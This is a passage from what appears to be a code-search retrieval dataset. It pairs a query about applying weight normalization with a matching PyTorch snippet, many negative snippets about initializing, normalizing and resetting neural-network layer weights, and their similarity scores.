normalize_weights(self):\n total_weight = sum(self.weights)\n self.norm_weights = self.weights / float(total_weight)", "def remove_weight_norm_and_equal_lr(module: Module,\n name: str = 'weight') -> Module:\n return remove_weight_lambda(module, 'norm_equal_lr', name)", "def _init_weights(self):\n for m in self.modules():\n if type(m) in {\n nn.Linear,\n nn.Conv3d,\n nn.Conv2d,\n nn.ConvTranspose2d,\n nn.ConvTranspose3d\n }:\n nn.init.kaiming_normal_(\n m.weight.data, a=0, mode='fan_out', nonlinearity='relu',\n )\n if m.bias is not None:\n fan_in, fan_out = \\\n nn.init._calculate_fan_in_and_fan_out(m.weight.data)\n bound = 1 / math.sqrt(fan_out)\n nn.init.normal_(m.bias, -bound, bound)", "def _setWeights(self):\r\n for layer in self.layer_names:\r\n raw_w = getattr(self, f'{layer}_raw')\r\n self.module._parameters[layer] = F.dropout(raw_w, p=self.weight_pro, training=self.training)", "def normalizeWeights(self):\n for wt in self.weights:\n wt[wt>1] = 1\n wt[wt<-1] = -1\n for bs in self.bias:\n bs[bs>1] = 1\n bs[bs<-1] = -1", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def reset_weights(self):\n self.head.reset_weights()", "def reset_all_weights(model: nn.Module) -> None:\n\n @torch.no_grad()\n def weight_reset(m: nn.Module):\n # - check if the current module has reset_parameters & if it's callabed called it on m\n reset_parameters = getattr(m, \"reset_parameters\", None)\n if callable(reset_parameters):\n m.reset_parameters()\n\n # Applies fn recursively to every submodule see: https://pytorch.org/docs/stable/generated/torch.nn.Module.html\n model.apply(fn=weight_reset)", "def associate_normalization_layers(self, model):\n if (len(self.leaf_modules) == 0):\n self.retrieve_leaf_modules(model) \n # Association list\n self.norm_modules = []\n self.prune_modules = []\n # Current weighted layer\n cur_weighted = None\n # Associate norm layers to their immediate previous weighted layers\n for name, m in self.leaf_modules:\n if (m.__class__ in [nn.Linear, nn.Conv1d, nn.Conv2d, nn.Conv3d, nn.ConvTranspose2d, nn.ConvTranspose3d]):\n cur_weighted = m\n if (m.__class__ in [nn.RNN, nn.GRU, nn.LSTM]):\n cur_weighted = m\n if ('Norm' in str(m.__class__)):\n if (cur_weighted is not None):\n self.norm_modules.append((m, cur_weighted))", "def reset(self):\n for layer in self.network:\n layer.clean()", "def remove_weight_scale(module: Module, name: str = 'weight') -> Module:\n return remove_weight_lambda(module, 'scale', name)", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n xavier_uniform_(m.weight)\n if m.bias is not None:\n zeros_(m.bias)", "def unfreeeze_all_layers(self):\n # Unfreeeze\n logger.info('MODEL: Unfreeze all layers.')\n for i in range(len(self.model.layers)):\n self.model.layers[i].trainable = True\n \n # Compile model\n logger.info('MODEL: Compiling...')\n self.model.compile(optimizer = Adam(lr=1e-4),\n loss={'yolo_loss': lambda y_true, y_pred: y_pred})", "def init_weights(self):\n # We don't use the `init_weights()` function in BaseModule, since it\n # doesn't support the initialization method from `reset_parameters()`\n # in Pytorch.\n if self.with_backbone:\n self.backbone.init_weights()\n\n if self.with_neck:\n for m in self.neck.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()\n\n if self.with_head:\n for m in self.head.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()", "def reset_model(model):\n\n\tfor layer in model.layers:\n\t\t# Note: these are custom depending on the layer type\n\t\tif '.MoleculeConv' in str(layer):\n\t\t\tW_inner = layer.init_inner((layer.inner_dim, layer.inner_dim))\n\t\t\tb_inner = np.zeros((1, layer.inner_dim))\n\t\t\t# Inner weights\n\t\t\tlayer.W_inner.set_value((T.tile(W_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, layer.inner_dim, layer.inner_dim)).eval()).astype(np.float32))\n\t\t\tlayer.b_inner.set_value((T.tile(b_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, 1, layer.inner_dim)).eval()).astype(np.float32))\n\n\t\t\t# Outer weights\n\t\t\tW_output = layer.init_output((layer.inner_dim, layer.units), scale = layer.scale_output)\n\t\t\tb_output = np.zeros((1, layer.units))\n\t\t\t# Initialize weights tensor\n\t\t\tlayer.W_output.set_value((T.tile(W_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlayer.b_output.set_value((T.tile(b_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlogging.info('graphFP layer reset')\n\n\t\telif '.Dense' in str(layer):\n\t\t\tlayer.W.set_value((layer.init(layer.W.shape.eval()).eval()).astype(np.float32))\n\t\t\tlayer.b.set_value(np.zeros(layer.b.shape.eval(), dtype=np.float32))\n\t\t\tlogging.info('dense layer reset')\n\n\t\telif '.Dropout' in str(layer):\n\t\t\tlogging.info('dropout unchanged')\n\t\telse:\n\t\t\traise ValueError('Unknown layer {}, cannot reset weights'.format(str(layer)))\n\tlogging.info('Reset model weights')\n\treturn model", "def _reset_weights(m):\n\n nn = import_optional_dependency(\"torch.nn\")\n init = import_optional_dependency(\"torch.nn.init\")\n if isinstance(m, nn.Conv1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.BatchNorm1d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm3d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.Linear):\n init.xavier_normal_(m.weight.data)\n init.normal_(m.bias.data)\n elif isinstance(m, nn.LSTM):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.LSTMCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRU):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRUCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)", "def remove_tracking(model, norm_type, norm_power=0.2):\n normlayer = select_norm(norm_type, norm_power=norm_power)\n # find total number of childern\n model_len = 0\n for n, child in enumerate(model.children()):\n model_len = n\n\n # for layer 0 which is outside\n conv_shape = model.conv1.out_channels\n w = model.bn1.weight\n b = model.bn1.bias\n model.bn1 = normlayer(conv_shape)\n model.bn1.weight = w\n model.bn1.bias = b\n\n # replace in all other layers\n for n, child in enumerate(model.children()):\n if 4 <= n <= model_len - 2:\n for i in range(len(child)):\n conv_shape = child[i].conv1.out_channels\n w = child[i].bn1.weight\n b = child[i].bn1.bias\n child[i].bn1 = normlayer(conv_shape)\n child[i].bn1.weight = w\n child[i].bn1.bias = b\n\n conv_shape = child[i].conv2.out_channels\n w = child[i].bn2.weight\n b = child[i].bn2.bias\n child[i].bn2 = normlayer(conv_shape)\n child[i].bn2.weight = w\n child[i].bn2.bias = b\n # if model have bn3 as well\n try:\n conv_shape = child[i].conv3.out_channels\n w = child[i].bn3.weight\n b = child[i].bn3.bias\n child[i].bn3 = normlayer(conv_shape)\n child[i].bn3.weight = w\n child[i].bn3.bias = b\n except:\n pass\n try:\n conv_shape = child[i].downsample[0].out_channels\n w = child[i].downsample[1].weight\n b = child[i].downsample[1].bias\n child[i].downsample[1] = normlayer(conv_shape)\n child[i].downsample[1].weight = w\n child[i].downsample[1].bias = b\n print(\"downsample\")\n except:\n print(\"no downsample\")\n\n return model", "def remove_spectral_norm(module, name='weight'):\n for k, hook in module._forward_pre_hooks.items():\n if isinstance(hook, SpectralNorm) and hook.name == name:\n hook.remove(module)\n del module._forward_pre_hooks[k]\n return module\n\n raise ValueError(\"spectral_norm of '{}' not found in {}\".format(\n name, module))", "def reset_weights(self):\r\n self._weights = deepcopy(self._tmp_weights)\r\n self._tmp_weights = None", "def normalize_weights(self):\n \n # Set negative weights to zero\n # Normalize to sum to one.\n \n\n\n self.new_weight=[]\n for i in self._weights:\n if any(i < 0 for i in self._weights):\n self.new_weight = [0,1]\n\n elif all(i == 0 for i in self._weights):\n i = 1/len(self._weights)\n self.new_weight.append(i)\n else:\n i = i/sum(self._weights)\n self.new_weight.append(i)\n\n # If the weights are all zeros, set weights equal to 1/k, where k is the number\n # of components.\n self._weights = self.new_weight\n self._weights = np.round(self._weights,3)", "def freeze_model(self):\n # BN layers need to be freezed explicitly since they cannot be freezed via '.requires_grad=False'\n for module in self.modules():\n if isinstance(module, (nn.BatchNorm2d, nn.GroupNorm)):\n module.eval()\n \n # freeze all parameters\n for param in self.parameters():\n param.requires_grad = False", "def update_weights(self):\n\n self.weights -= self.loss_grads\n self.loss_grads = np.zeros(self.weights.shape)", "def reset(self):\n self._weights.clear()", "def init_weights(self, module):\n if isinstance(module, (torch.nn.Linear, torch.nn.Embedding, torch.nn.LayerNorm)):\n module.weight.data.normal_(mean=0.0, std=self.initializer_range)\n if isinstance(module, (torch.nn.Linear, torch.nn.LayerNorm)) and module.bias is not None:\n module.bias.data.zero_()", "def reset_parameters(self) -> None:\n for name, param in self.named_parameters():\n if not (name == 'word_embedding.weight' and self.use_pretrained_embeddings):\n nn.init.normal(param, std=0.1)", "def _rescale_module(module):\n for sub in module.modules():\n if isinstance(sub, (nn.Conv1d, nn.ConvTranspose1d, nn.Conv2d, nn.ConvTranspose2d)):\n std = sub.weight.std().detach()\n scale = (std / 0.1) ** 0.5\n sub.weight.data /= scale\n if sub.bias is not None:\n sub.bias.data /= scale", "def _set_freeze_layers(self):\n for layer in self.encoder.layers[:self.freeze_layers]:\n layer.trainable = False", "def reset_parameters(self):\n model_utils.truncated_normal_(self.weight, mean=0.0, std=0.1)\n model_utils.truncated_normal_(self.bias, mean=0.0, std=0.1)", "def apply_weight_norm(self):\n\n def _apply_weight_norm(m):\n if isinstance(m, torch.nn.Conv1d) or isinstance(\n m, torch.nn.ConvTranspose1d\n ):\n torch.nn.utils.weight_norm(m)\n logging.debug(f\"Weight norm is applied to {m}.\")\n\n self.apply(_apply_weight_norm)", "def apply_weight_norm(self):\n\n def _apply_weight_norm(m):\n if isinstance(m, torch.nn.Conv1d) or isinstance(\n m, torch.nn.ConvTranspose1d\n ):\n torch.nn.utils.weight_norm(m)\n logging.debug(f\"Weight norm is applied to {m}.\")\n\n self.apply(_apply_weight_norm)", "def apply_weight_norm(self):\n\n def _apply_weight_norm(m):\n if isinstance(m, torch.nn.Conv1d) or isinstance(\n m, torch.nn.ConvTranspose1d\n ):\n torch.nn.utils.weight_norm(m)\n logging.debug(f\"Weight norm is applied to {m}.\")\n\n self.apply(_apply_weight_norm)", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n xavier_init(m)", "def set_to_zero_model_weights(model):\n\n for layer_weigths in model.parameters():\n layer_weigths.data.sub_(layer_weigths.data)", "def clear(self):\n for i in range(0, len(self.weights)):\n self.weights[i] = 0", "def init_weights(layer):\r\n layer_name = layer.__class__.__name__\r\n if layer_name.find(\"Conv\") != -1:\r\n layer.weight.data.normal_(0.0, 0.02)\r\n elif layer_name.find(\"BatchNorm\") != -1:\r\n layer.weight.data.normal_(1.0, 0.02)\r\n layer.bias.data.fill_(0)", "def init_weights(layer):\n layer_name = layer.__class__.__name__\n if layer_name.find(\"Conv\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(0.0, 0.02)\n elif layer_name.find(\"BatchNorm\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(1.0, 0.02)\n layer.bias.data.fill_(0)", "def normalize_weights(self, w):\n n = w.astype(np.float64, copy=True)\n c = float(np.sum(w))\n n /= c\n return n", "def initialize_weights(self):\n for layer in self._cnn_layers:\n weights_initializer.WeightsInitializer.initialize_layer_or_model(layer)", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def normalize_weight(self, Z):\n self.weight /= Z", "def init_weights(self):\n with torch.no_grad():\n self._init_weights()", "def reset(self):\n ih = (param for name, param in self.named_parameters() if 'weight_ih' in name)\n hh = (param for name, param in self.named_parameters() if 'weight_hh' in name)\n b = (param for name, param in self.named_parameters() if 'bias' in name)\n for t in ih:\n torch.nn.init.xavier_uniform_(t)\n for t in hh:\n torch.nn.init.orthogonal_(t)\n for t in b:\n torch.nn.init.constant_(t, 0)", "def init_weights(self, clz):\n for ch in self.children():\n if issubclass(ch.__class__, nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: clz._init_weights(self.lrm, module))", "def clear_layers_name():\n set_keep['_layers_name_list'] =[]", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)", "def reset_nn(self): # Clear current network\n self.weights = np.zeros((p.num_rovers, self.n_weights))\n self.in_layer = np.zeros((p.num_rovers, self.n_inputs))\n self.hid_layer = np.zeros((p.num_rovers, self.n_nodes))\n self.out_layer = np.zeros((p.num_rovers, self.n_outputs))", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def unfreeze_layers(model: torch.nn.Module) -> None:\n for param in model.parameters():\n param.requires_grad = True", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.projection_matrices.data = normalize(self.projection_matrices.data, p=2, dim=2)", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.ent_proj_vects.data = normalize(self.ent_proj_vects.data, p=2, dim=1)\n self.rel_proj_vects.data = normalize(self.rel_proj_vects.data, p=2, dim=1)", "def reset_weights(self):\n np.random.seed(self.seed)\n self.node_embedding = xavier_normal(size=(self.vocab_size, self.layer1_size), as_type=np.float32)\n self.context_embedding = xavier_normal(size=(self.vocab_size, self.layer1_size), as_type=np.float32)\n\n\n self.centroid = np.zeros((self.k, self.layer1_size), dtype=np.float32)\n self.covariance_mat = np.zeros((self.k, self.layer1_size, self.layer1_size), dtype=np.float32)\n self.inv_covariance_mat = np.zeros((self.k, self.layer1_size, self.layer1_size), dtype=np.float32)\n self.pi = np.zeros((self.vocab_size, self.k), dtype=np.float32)", "def remove_weights(self):\n cdef StdVectorFst result = StdVectorFst(isyms=self.isyms, osyms=self.osyms)\n openfst.ArcMap(self.fst[0], result.fst, openfst.RmTropicalWeightMapper())\n return result", "def turn_intensity_normalization_off(self):\n self.intensity_normalize_image = False", "def module_cleanup():\n from bokeh.core.has_props import _default_resolver\n to_reset = list(panel_extension._imports.values())\n\n _default_resolver._known_models = {\n name: model for name, model in _default_resolver._known_models.items()\n if not any(model.__module__.startswith(tr) for tr in to_reset)\n }", "def reset(self):\n weight = self.module.weight.data\n self.sensitivity_in = torch.zeros(weight.shape[1]).to(weight.device)\n self._features = torch.Tensor()\n self._current_batch = 1", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.ConvTranspose2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def reset_pooling_layer(self):\n self._semantic_decoder.reset_pooling_layer()\n if self._instance_decoder is not None:\n self._instance_decoder.reset_pooling_layer()", "def reset_pooling_layer(self):\n self._aspp.reset_pooling_layer()", "def extract_weights(self, name):\n\n # Extract weights\n weight_layer = (self.merged_model).get_layer(name)\n weights = weight_layer.get_weights()[0]\n\n # Normalize\n # weights = weights / np.linalg.norm(weights, axis = 1).reshape((-1, 1))\n return weights", "def reset_parameters(self):\n if self.W is not None:\n tanh_gain = weight_init.calculate_gain(\"tanh\")\n weight_init.xavier_normal_(self.W, tanh_gain)\n # self.W.data.uniform_(-0.001, 0.001)", "def modify_weights_after_load(model):\n # Prune heads if needed\n if model.config.pruned_heads:\n model.prune_heads(model.config.pruned_heads)\n\n # Tie weights if needed\n model.tie_weights()", "def init_weights(model, fc_init_std=0.01):\n for m in model.modules():\n if isinstance(m, nn.Conv3d):\n \"\"\"\n Follow the initialization method proposed in:\n {He, Kaiming, et al.\n \"Delving deep into rectifiers: Surpassing human-level\n performance on imagenet classification.\"\n arXiv preprint arXiv:1502.01852 (2015)}\n \"\"\"\n c2_msra_fill(m, nonlinearity=('relu', 'leaky_relu')[0])\n # c2_xavier_fill(m)\n # nn.init.xavier_normal_(m.weight)\n # nn.init.xavier_uniform_(m.weight)\n # if m.bias is not None: # pyre-ignore\n # nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm3d) or isinstance(m, nn.InstanceNorm3d):\n m.weight.data.fill_(1.0)\n m.bias.data.zero_()\n if isinstance(m, nn.Linear): # This assumes nn.Linear is the final layers\n # TODO check to see if this is effective in this architecture since the final is a conv3d\n m.weight.data.normal_(mean=0.0, std=fc_init_std)\n m.bias.data.zero_()", "def _init_weights(self):\n nn.init.xavier_normal_(self.out.weight)", "def normalize_weights(w, dims=(0,), bias=1e-5):\n with tf.name_scope('normalization'):\n return w / (tf.sqrt(tf.reduce_sum(tf.square(w), dims, keep_dims=True) + bias))", "def init_weights(net):\n for m in net.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_uniform_(m.weight)\n # nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n return net", "def normalize(self, weights):\n tot = sum(weights)\n newW = [-1] * self.numParticles\n for i in range(len(weights)):\n newW[i] = weights[i] / tot\n return newW", "def train(self, mode=True, freeze_bn=False):\n super(WideResNet, self).train(mode)\n self.freeze_bn = freeze_bn\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def set_weights_without_biases(self, weights, layer_number):\r\n self.weights[layer_number] = weights", "def _cleanup(self):\n\n self.netIns = []\n self.netOuts = []\n self.Gradients = [None]*self.size", "def _init_weights(layer):\n if isinstance(layer, (nn.Conv2d, nn.Linear)):\n torch.nn.init.xavier_uniform_(layer.weight)\n try:\n # Some layers may not have biases, so catch the exception and pass.\n layer.bias.data.fill_(0.0)\n except AttributeError:\n pass", "def reset(self):\n\n def reset_function(module):\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n m.reset_parameters()\n\n self.apply(reset_function)", "def init_weights(self):\n\n for ch in self.children():\n if issubclass(ch.__class__, torch.nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: self.transformer.__class__._init_weights(self.transformer, module))", "def reset_parameters(self) -> None:\n std = math.sqrt(3 / self.in_features)\n self.weight.data.uniform_(-std, std)\n self.bias.data.uniform_(-std, std)", "def applyMorphologicalCleaning(self, image):", "def test_permute_W_no_model(self):\n\t\tN, M = 4096, 4096\n\t\titerator = self.watcher.make_layer_iterator(model=self.model, layers=[self.fc2_layer])\n\t\tfor ww_layer in iterator:\n\t\t\tself.assertEqual(ww_layer.layer_id,self.fc2_layer)\n\t\t\tW = ww_layer.Wmats[0]\n\t\t\tself.assertEqual(W.shape,(N,M))\n\t\t\t\n\t\t\tself.watcher.apply_permute_W(ww_layer)\n\t\t\tW2 = ww_layer.Wmats[0]\n\t\t\tself.assertNotEqual(W[0,0],W2[0,0])\n\t\t\t\n\t\t\tself.watcher.apply_unpermute_W(ww_layer)\n\t\t\tW2 = ww_layer.Wmats[0]\n\t\t\tself.assertEqual(W2.shape,(N,M))\n\t\t\tself.assertEqual(W[0,0],W2[0,0])", "def reset_layer(self):\n if self.W is None:\n if self.sparse_initialize:\n W_values = self.sparse_initialize_weights()\n else:\n if self.activation == theano.tensor.tanh:\n born = np.sqrt(6. / (self.n_in + self.n_out))\n else:\n born = 4 * np.sqrt(6. / (self.n_in + self.n_out))\n W_values = np.asarray(self.rng.uniform(\n low=-born,\n high=born,\n size=(self.n_in, self.n_out)),\n dtype=theano.config.floatX)\n\n self.W = theano.shared(value=W_values, name='W', borrow=True)\n\n if self.b is None:\n b_values = np.zeros(int(self.n_out/self.num_pieces),\n dtype=theano.config.floatX)\n self.b = theano.shared(value=b_values, name='b', borrow=True)\n\n if self.sparser is None:\n s_values = np.ones(\n int(self.n_out/self.num_pieces), dtype=theano.config.floatX)\n self.sparser = theano.shared(value=s_values, name='sparser',\n borrow=True)\n # The layer parameters\n self.params = [self.W, self.b]", "def RemoveWeights(frame, zero_nans=False):\n if \"Wpol\" not in frame and \"Wunpol\" not in frame:\n return\n\n if not frame[\"T\"].weighted:\n return frame\n ValidateMaps(frame)\n\n tmap = frame.pop(\"T\")\n\n if \"Wpol\" in frame:\n wmap = frame[\"Wpol\"]\n qmap = frame.pop(\"Q\")\n umap = frame.pop(\"U\")\n maps.remove_weights(tmap, qmap, umap, wmap, zero_nans=zero_nans)\n else:\n wmap = frame[\"Wunpol\"]\n maps.remove_weights_t(tmap, wmap, zero_nans=zero_nans)\n\n frame[\"T\"] = tmap\n if \"Wpol\" in frame:\n frame[\"Q\"] = qmap\n frame[\"U\"] = umap\n\n return frame", "def reset_parameters(self):\n\n for layer in self.layers:\n layer.reset_parameters()", "def _untrain(self):\n if not self.trained:\n return\n for clf in self.clfs:\n clf.untrain()\n super(BoostedClassifier, self)._untrain()", "def init_weights(module, negative_slope=0):\n if isinstance(module, (nn.Conv2d, nn.ConvTranspose2d)):\n nn.init.kaiming_normal_(module.weight.data, negative_slope)\n module.bias.data.zero_()", "def remove_blurring(self):\n self._render_passes.remove_blur_pass()", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)\n self.normal_vectors.data = normalize(self.normal_vectors, p=2, dim=1)", "def initialize_weights(self):\n weights_initializer.WeightsInitializer.initialize_layer_or_model(\n self._batch)", "def reset_layers(self, rov_id): # Clear hidden layers and output layers\n for i in range(self.n_nodes):\n self.hid_layer[rov_id, i] = 0.0\n\n for j in range(self.n_outputs):\n self.out_layer[rov_id, j] = 0.0", "def weight_norm(module, name=\"weight\", dim=0):\n WeightNorm.apply(module, name, dim)\n return module" ]
[ "0.79998016", "0.76628864", "0.7629923", "0.72848314", "0.7045166", "0.67848754", "0.6780856", "0.6746634", "0.6591088", "0.65823525", "0.6566755", "0.65617", "0.65572643", "0.65561306", "0.6538293", "0.6538293", "0.6538293", "0.6529808", "0.6526071", "0.651576", "0.64801204", "0.6455137", "0.64305204", "0.642898", "0.6405197", "0.6397573", "0.63855386", "0.6293032", "0.6251394", "0.6249921", "0.6233528", "0.6218253", "0.62125546", "0.6161037", "0.6131475", "0.61087567", "0.60970056", "0.6089598", "0.60496736", "0.60437787", "0.60437787", "0.60437787", "0.6040404", "0.60095733", "0.59844965", "0.5978158", "0.597737", "0.5969688", "0.5968303", "0.5965113", "0.5965113", "0.5962245", "0.59447", "0.5936001", "0.5907403", "0.59055173", "0.5901809", "0.5892338", "0.58894366", "0.58894366", "0.5871337", "0.5862168", "0.58555585", "0.5836302", "0.58316904", "0.5826069", "0.5822462", "0.5818256", "0.5817126", "0.5813045", "0.5796031", "0.5795884", "0.57813996", "0.57679164", "0.57545006", "0.57498974", "0.5747443", "0.57424116", "0.57346195", "0.5728497", "0.57271147", "0.5710471", "0.5693999", "0.5684778", "0.56757396", "0.5671626", "0.5663894", "0.5649495", "0.5648036", "0.56285703", "0.5622598", "0.5621248", "0.5614808", "0.5613118", "0.5610067", "0.55977714", "0.5596888", "0.55955064", "0.5567413" ]
0.7893102
2
Apply weight normalization module from all of the layers.
def apply_weight_norm(self): def _apply_weight_norm(m): if isinstance(m, torch.nn.Conv1d) or isinstance( m, torch.nn.ConvTranspose1d ): torch.nn.utils.weight_norm(m) logging.debug(f"Weight norm is applied to {m}.") self.apply(_apply_weight_norm)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def associate_normalization_layers(self, model):\n if (len(self.leaf_modules) == 0):\n self.retrieve_leaf_modules(model) \n # Association list\n self.norm_modules = []\n self.prune_modules = []\n # Current weighted layer\n cur_weighted = None\n # Associate norm layers to their immediate previous weighted layers\n for name, m in self.leaf_modules:\n if (m.__class__ in [nn.Linear, nn.Conv1d, nn.Conv2d, nn.Conv3d, nn.ConvTranspose2d, nn.ConvTranspose3d]):\n cur_weighted = m\n if (m.__class__ in [nn.RNN, nn.GRU, nn.LSTM]):\n cur_weighted = m\n if ('Norm' in str(m.__class__)):\n if (cur_weighted is not None):\n self.norm_modules.append((m, cur_weighted))", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def _init_weights(self):\n for m in self.modules():\n if type(m) in {\n nn.Linear,\n nn.Conv3d,\n nn.Conv2d,\n nn.ConvTranspose2d,\n nn.ConvTranspose3d\n }:\n nn.init.kaiming_normal_(\n m.weight.data, a=0, mode='fan_out', nonlinearity='relu',\n )\n if m.bias is not None:\n fan_in, fan_out = \\\n 